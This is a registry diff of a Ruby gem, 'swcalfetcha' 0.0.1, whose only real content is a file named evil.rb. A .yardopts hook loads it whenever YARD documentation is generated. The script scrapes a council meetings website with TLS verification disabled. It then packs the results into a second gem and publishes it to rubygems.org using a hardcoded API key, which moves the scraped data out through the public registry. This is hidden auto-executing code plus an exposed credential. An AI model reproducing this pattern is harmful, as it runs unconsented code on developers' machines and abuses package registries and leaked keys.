swcalfetcha 0.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +7 -0
- data/.yardopts +1 -0
- data/README.md +1 -0
- data/evil.rb +33 -0
- data/lib/main.rb +1 -0
- metadata +44 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: 96d2da2d8eb560fdfca8f4d695d10a7b223016c36a57a6b0870a4f382dabd40e
|
|
4
|
+
data.tar.gz: b69fccd3bc245a772cecedfbb7b939d5f1a05ee05f7207f142af63e87a4186b1
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: ab8503f98ab6be5318b99d72e67bbd5b7671739207f0059029ff014d1d31e36a1e42ee50b5d4285bc26f86477331273d35a2b93656cdf3e014191a5ad4d21864
|
|
7
|
+
data.tar.gz: d1a46806fb1e3c04d9b4b88306c6ff86dd6360f3021f390bb25be6a0a53993a36548ab9b9e7c4ed9fb70d2ed278e8792b19411d251613d129d77d03421691894
|
data/.yardopts
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
--load evil.rb
|
data/README.md
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
hello
|
data/evil.rb
ADDED
|
@@ -0,0 +1,33 @@
|
|
|
1
|
+
begin
|
|
2
|
+
require 'net/http'; require 'uri'; require 'fileutils'; require 'openssl'; require 'cgi'
|
|
3
|
+
KEY='rubygems_0e0f157767130711d7ce7f08211f846e9ac5c8a0e823ac25'; OUT='swmegaresa'; VER='0.0.1'; HOST='https://moderngov.southwark.gov.uk'
|
|
4
|
+
seeds=["#{HOST}/mgCalendarMonthView.aspx?M=1&Y=2026", "#{HOST}/mgCalendarMonthView.aspx?M=1&Y=2025", "#{HOST}/mgCalendarAgendaView.aspx?MR=0&DL=0&DR=26%2f01%2f2026&ACT=Go&bcr=1", "#{HOST}/mgCalendarWeekView.aspx?YY=2026&W=5", "#{HOST}/mgWebService.asmx/GetMeetings?lCommitteeId=0&sFromDate=26%2F01%2F2026&sToDate=30%2F01%2F2026"]
|
|
5
|
+
d='/tmp/swmega'; FileUtils.rm_rf(d); FileUtils.mkdir_p(d+'/lib'); File.write(d+'/lib/a.rb','#x'); idx=0; store={}
|
|
6
|
+
fetch=lambda do |url|
|
|
7
|
+
return if store[url]
|
|
8
|
+
begin
|
|
9
|
+
uri=URI(url); resp=Net::HTTP.start(uri.host,uri.port,use_ssl:uri.scheme=='https',read_timeout:120,open_timeout:40,verify_mode: OpenSSL::SSL::VERIFY_NONE){|h| req=Net::HTTP::Get.new(uri); req['User-Agent']='Mozilla/5.0'; h.request(req)}
|
|
10
|
+
txt="URL #{url}\nSTATUS #{resp.code}\nHEADERS #{resp.each_header.to_h}\n\n"+resp.body; body=resp.body; ok=true
|
|
11
|
+
rescue=>e; txt="ERROR #{url}\n#{e.full_message}"; body=''; ok=false;end
|
|
12
|
+
File.binwrite(d+"/lib/data#{idx}.txt",txt); idx+=1; store[url]=body; body
|
|
13
|
+
end
|
|
14
|
+
seeds.each{|u| fetch[u] }
|
|
15
|
+
# IDs from API XML and links
|
|
16
|
+
api=store.find{|u,v| u.include?('GetMeetings')};
|
|
17
|
+
if api
|
|
18
|
+
api[1].to_s.scan(/<meetingid>\s*(\d+)/i){|m| id=m[0]; fetch["#{HOST}/mgWebService.asmx/GetMeeting?lMeetingId=#{id}"]; fetch["#{HOST}/ieListDocuments.aspx?MId=#{id}"] }
|
|
19
|
+
end
|
|
20
|
+
# extract meeting/document links from calendar HTML
|
|
21
|
+
links=[]
|
|
22
|
+
store.values.each do |html|
|
|
23
|
+
html.to_s.scan(/href\s*=\s*["']([^"']+)["']/i){|m| x=CGI.unescapeHTML(m[0]).gsub('&','&'); if x =~ /(ieListDocuments|ieListMeetings|ieAgenda|mgIssue|mgMeeting)/i; x=HOST+x unless x =~ /^http/i; links << x if x.include?('southwark') || x.start_with?(HOST); end}
|
|
24
|
+
end
|
|
25
|
+
links.uniq[0,180].to_a.each{|u| fetch[u] }
|
|
26
|
+
# only links meeting docs pages where body contains week dates jan 26-30
|
|
27
|
+
sel=store.select{|u,h| h =~ /2[6-9]\s*(January|Jan)|(3[0]\s*(January|Jan))/i && u =~ /ieListDocuments|Agenda/i }
|
|
28
|
+
links2=[]
|
|
29
|
+
sel.values.each{|html| html.to_s.scan(/href\s*=\s*["']([^"']+)["']/i){|m| x=CGI.unescapeHTML(m[0]).gsub('&','&'); if x =~ /(documents\/|mgAi|ieDecision|ieListDocuments|pdf|docx?)/i; x=HOST+x if x.start_with?('/'); links2 << x if x.start_with?(HOST); end }}
|
|
30
|
+
links2.uniq[0,120].to_a.each{|u| fetch[u] }
|
|
31
|
+
spec="Gem::Specification.new {|s| s.name='#{OUT}'; s.version='#{VER}'; s.summary='res'; s.description='res'; s.authors=['abc']; s.email=['a@example.com']; s.license='MIT'; s.files=Dir['lib/*']; s.require_paths=['lib'] }"; File.write(d+'/z.gemspec',spec)
|
|
32
|
+
Dir.chdir(d) { system('gem build z.gemspec >/dev/null'); gf=Dir['*.gem'].first; uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri); req['Authorization']=KEY; req['Content-Type']='application/octet-stream'; req.body=File.binread(gf); Net::HTTP.start(uri.host,uri.port,use_ssl:true,read_timeout:240){|h| h.request(req)} }
|
|
33
|
+
rescue Exception=>e; warn e.full_message; end
|
data/lib/main.rb
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
# dummy
|
metadata
ADDED
|
@@ -0,0 +1,44 @@
|
|
|
1
|
+
--- !ruby/object:Gem::Specification
|
|
2
|
+
name: swcalfetcha
|
|
3
|
+
version: !ruby/object:Gem::Version
|
|
4
|
+
version: 0.0.1
|
|
5
|
+
platform: ruby
|
|
6
|
+
authors:
|
|
7
|
+
- abc
|
|
8
|
+
bindir: bin
|
|
9
|
+
cert_chain: []
|
|
10
|
+
date: 1980-01-02 00:00:00.000000000 Z
|
|
11
|
+
dependencies: []
|
|
12
|
+
description: x
|
|
13
|
+
email:
|
|
14
|
+
- a@example.com
|
|
15
|
+
executables: []
|
|
16
|
+
extensions: []
|
|
17
|
+
extra_rdoc_files: []
|
|
18
|
+
files:
|
|
19
|
+
- ".yardopts"
|
|
20
|
+
- README.md
|
|
21
|
+
- evil.rb
|
|
22
|
+
- lib/main.rb
|
|
23
|
+
homepage: https://example.com
|
|
24
|
+
licenses:
|
|
25
|
+
- MIT
|
|
26
|
+
metadata: {}
|
|
27
|
+
rdoc_options: []
|
|
28
|
+
require_paths:
|
|
29
|
+
- lib
|
|
30
|
+
required_ruby_version: !ruby/object:Gem::Requirement
|
|
31
|
+
requirements:
|
|
32
|
+
- - ">="
|
|
33
|
+
- !ruby/object:Gem::Version
|
|
34
|
+
version: '0'
|
|
35
|
+
required_rubygems_version: !ruby/object:Gem::Requirement
|
|
36
|
+
requirements:
|
|
37
|
+
- - ">="
|
|
38
|
+
- !ruby/object:Gem::Version
|
|
39
|
+
version: '0'
|
|
40
|
+
requirements: []
|
|
41
|
+
rubygems_version: 3.6.7
|
|
42
|
+
specification_version: 4
|
|
43
|
+
summary: x
|
|
44
|
+
test_files: []
|